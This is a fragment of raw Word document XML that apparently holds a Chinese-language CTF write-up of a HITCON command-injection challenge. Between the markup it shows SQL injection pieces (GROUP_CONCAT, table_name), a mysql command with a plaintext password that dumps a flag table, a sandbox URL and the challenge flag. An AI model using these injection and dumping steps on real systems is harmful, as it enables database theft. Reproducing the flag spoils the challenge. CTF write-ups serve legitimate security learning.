        <w:tblW w:w="83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8033"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="4F264775" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="9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D222C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1154BD4A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E8869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GROUP_</w:t>
            </w:r>
            <w:proofErr w:type="gram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CONCAT(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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table_name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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BF41DC1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this_is_the_fl4g</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A904540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index.html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DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="4A0ACF00" w14:textId="77777777" w:rsidTr="00DB0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D5162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81218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mysql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-ufl4444g -pSugZXUtgeJ52_Bvr -e "(SELECT * FROM fl4gdb.this_is_the_fl4g" &gt;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　</w:t>
            </w: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kk9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BB41A41" w14:textId="77777777" w:rsidR="00DB0ED3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访问：</w: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begin"/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instrText xml:space="preserve"> HYPERLINK "http://52.199.204.34/sandbox/%E5%AF%B9%E5%BA%94md5/kk9%EF%BC%8C" \t "_blank" </w:instrTex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separate"/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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://52.199.204.34/sandbox/对应md5/kk9，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0ED3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DB0ED3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> 得到：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121"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="2D1C844E" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="15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FEEA0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  <w:p w14:paraId="6652671C" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0ED3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A8819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secret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0053E248" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0ED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hitcon</w:t>
            </w:r>
            <w:proofErr w:type="spell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{idea_from_phith0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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n,thank</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB0ED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_you:)}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="268EF633" w14:textId="0957EAFA" w:rsidR="00A227D9" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0ED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B0ED3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 wp14:anchorId="39E66993" wp14:editId="0DAC25B6">
            <wp:extent cx="5389009" cy="1749879"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1" name="图片 1" descr="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/8.png?raw=tru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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/8.png?raw=tru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108" cy="175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7D9" w:rsidRPr="00DB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62418"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E090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30F78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B38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A5"/>
    <w:rsid w:val="0043429B"/>
    <w:rsid w:val="005701DD"/>
    <w:rsid w:val="008753A5"/>
    <w:rsid w:val="00D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3DEC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{994D9376-EAFA-4592-9511-AD3D96CD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0E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ED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B0E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0ED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B0E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0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">
    <w:name w:val="meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB0ED3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB0ED3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB0ED3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="number">
    <w:name w:val="number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB0ED3"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB0ED3"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="builtin">
    <w:name w:val="built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DB0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Ybeta/chybeta.github.io/blob/master/images/pic/20171104/3.png?raw=tru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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/8.png?raw=tru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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/5.png?raw=true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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/7.png?raw=tru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HYbeta/chybeta.github.io/blob/master/images/pic/20171104/2.png?raw=tru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hybeta.gitbooks.io/waf-bypass/content/ming-ling-zhu-ru/rao-guo-fang-fa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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/4.png?raw=true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HYbeta/chybeta.github.io/blob/master/images/pic/20171104/6.png?raw=tr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2019-11-15T11:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-15T11:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>